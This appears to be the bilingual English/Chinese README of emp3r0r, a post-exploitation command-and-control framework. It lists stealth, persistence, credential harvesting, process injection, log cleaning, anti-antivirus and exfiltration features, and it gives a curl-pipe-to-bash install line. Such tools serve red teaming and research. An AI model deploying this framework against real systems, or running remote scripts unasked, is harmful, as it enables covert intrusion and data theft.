A post-exploitation framework for Linux/Windows
适用于 Linux/Windows 的后开发框架
emp3r0r-reverse-proxy-demo.mp4
More Screenshots and videos
更多截图和视频
How to use 如何使用
curl -sSL https://raw.githubusercontent.com/jm33-m0/emp3r0r/refs/heads/master/install.sh | bashRead the wiki to get started. Please also consider contributing your own documentation there to help others.
阅读 wiki 以开始使用。也请考虑在那里贡献你自己的文档来帮助其他人。
Motivation 赋予动机
Initially, emp3r0r was developed as one of my weaponizing experiments. It was a learning process for me trying to implement common Linux adversary techniques and some of my original ideas.
最初,emp3r0r 是作为我的武器化实验之一开发的。对我来说,这是一个学习过程,我尝试实现常见的 Linux 对手技术和我的一些原始想法。
So, what makes emp3r0r different? First of all, it is the first C2 framework that targets Linux platform including the capability of using any other tools through it. Take a look at the features for more valid reasons to use it.
那么,是什么让 emp3r0r 与众不同呢?首先,它是第一个针对 Linux 平台的 C2 框架,包括通过它使用任何其他工具的能力。查看这些功能,了解使用它的更多正当理由。
To support third-party modules, emp3r0r has complete python3 support, included in vaccine module, 15MB in total, with necessary third party packages such as Impacket, Requests and MySQL.
为了支持第三方模块,emp3r0r 具有完整的 python3 支持,包含在 vaccine 模块中,总共 15MB,以及必要的第三方包,例如 Impacket、Requests 和 MySQL。
Features 特征
- Beautiful Terminal UI 美观的终端用户界面
- Stealth
隐身
- Automatically changes
argvso you won't notice it inpslisting
自动更改argv,因此您不会在ps列表中注意到它 - Hide files and PIDs via Glibc hijacking (
patcheringet_persistence)
通过 Glibc 劫持隐藏文件和 PID(get_persistence中的patcher) - Built-in Elvish Shell with the same disguise as main process
内置精灵 Shell,与主进程相同伪装 - Bring Your Own Shell or any interactive programs via custom modules such as bettercap
通过自定义模块(如 bettercap)自带 Shell 或任何交互式程序
- Automatically changes
- All C2 communications made in HTTP2/TLS
所有 C2 通信均以 HTTP2/TLS 进行- Defeat JA3 fingerprinting with UTLS
使用 UTLS 击败 JA3 指纹识别 - Painlessly encapsulated in Shadowsocks and KCP
无痛封装在 Shadowsocks 和 KCP 中 - Able to encapsulate in any external proxies such as TOR and CDNs
能够封装在任何外部代理中,例如 TOR 和 CDNs - C2 relaying via SSH
通过 SSH 进行 C2 中继
- Defeat JA3 fingerprinting with UTLS
- Cross-platform memory dumping
跨平台内存转储 - Staged Payload Delivery for both Linux and Windows
适用于 Linux 和 Windows 的分阶段负载交付- HTTP Listener with AES and compression
具有 AES 和压缩的 HTTP 侦听器 - DLL agent, Shellcode agent for Windows targets and Shared Library stager with compression and encryption for Linux
DLL 代理、用于 Windows 目标的 Shellcode 代理和用于 Linux 的具有压缩和加密功能的共享库暂存器
- HTTP Listener with AES and compression
- Automatically bridge agents from internal networks to C2 using Shadowsocks proxy chain
使用 Shadowsocks 代理链自动将代理从内部网络桥接到 C2- For semi-isolated networks, where agents can negotiate and form a proxy chain
对于半隔离网络,代理可以在其中协商并形成代理链
- For semi-isolated networks, where agents can negotiate and form a proxy chain
- Any reachable targets can be (reverse) proxied out via SSH and stealth KCP tunnel
任何可到达的目标都可以通过 SSH 和隐身 KCP 隧道(反向)代理出去- Bring any targets you can reach to C2
将你能到达的任何目标带到 C2 - Useful when targets can't establish outgoing connections but can accept incoming requests
当目标无法建立传出连接但可以接受传入请求时非常有用
- Bring any targets you can reach to C2
- Multi-Tasking
多任务处理
- Don't have to wait for any commands to finish
不必等待任何命令完成
- Don't have to wait for any commands to finish
- Module Support
模块支持
- Provides python3 environment that can easily run your exploits/tools on any Linux host
提供 python3 环境,可以轻松地在任何 Linux 主机上运行您的漏洞利用/工具 - Custom Modules 自定义模块
- Supports various modules formats:
exe,elf,python,powershell,bash,dll, andso
支持各种模块格式:exe、elf、python、powershell、bash、dll等 - Ability to run a module as an interactive shell, eg.
bettercap,elvish.
能够将模块作为交互式 shell 运行,例如。bettercap,精灵。 - In-memory execution for modules:
bash,powershell,python, and even ELF executables (CGOELF loader)
模块的内存中执行:bash、powershell、python,甚至 ELF 可执行文件(CGOELF 加载程序)
- Provides python3 environment that can easily run your exploits/tools on any Linux host
- Perfect Shell Experience via SSH with PTY support
通过 SSH 提供 Perfect Shell 体验,支持 PTY- Compatible with any SSH client and available for Windows
与任何 SSH 客户端兼容并可用于 Windows
- Compatible with any SSH client and available for Windows
- Bettercap 百特凯普
- Auto persistence via various methods
通过各种方法自动持久化 - Post-exploitation Tools 漏洞利用后工具
- Nmap, Socat, Ncat, Bettercap, etc
Nmap、Socat、Ncat、Bettercap 等
- Nmap, Socat, Ncat, Bettercap, etc
- Credential Harvesting 凭证收集
- Process Injection 工艺注入
- Shellcode Injection Shellcode 注入
- ELF Patcher for persistence
用于持久性的 ELF Patcher - Hide processes and files and get persistence via shared library injection
隐藏进程和文件,并通过共享库注入获得持久性 - Networking
联网
- Port Mapping
端口映射
- From C2 side to agent side, and vice versa
从 C2 端到代理端,反之亦然 - TCP/UDP both supported 支持 TCP/UDP
- From C2 side to agent side, and vice versa
- Agent Side Socks5 Proxy with UDP support
支持 UDP 的代理端 Socks5 代理
- Port Mapping
端口映射
- Auto Root 自动根
- LPE Suggest LPE 建议
- System Info Collect 系统信息收集
- File Management
文件管理
- Resumable downloads/uploads with integrity verification
使用完整性验证的断点续传下载/上传 - Recursive downloads with regex filter support
支持正则表达式过滤器的递归下载 - Transparent
zstdcompression for data exfiltration
用于数据泄露的透明zstd压缩 - SFTP support: browse remote files with any SFTP client, including your local GUI file manager
SFTP 支持:使用任何 SFTP 客户端浏览远程文件,包括本地 GUI 文件管理器
- Resumable downloads/uploads with integrity verification
- Log Cleaner 日志清理器
- Screenshot 截图
- Anti-Antivirus 防防病毒
- Internet Access Checker Internet 访问检查器
- and many more :) 以及更多:)
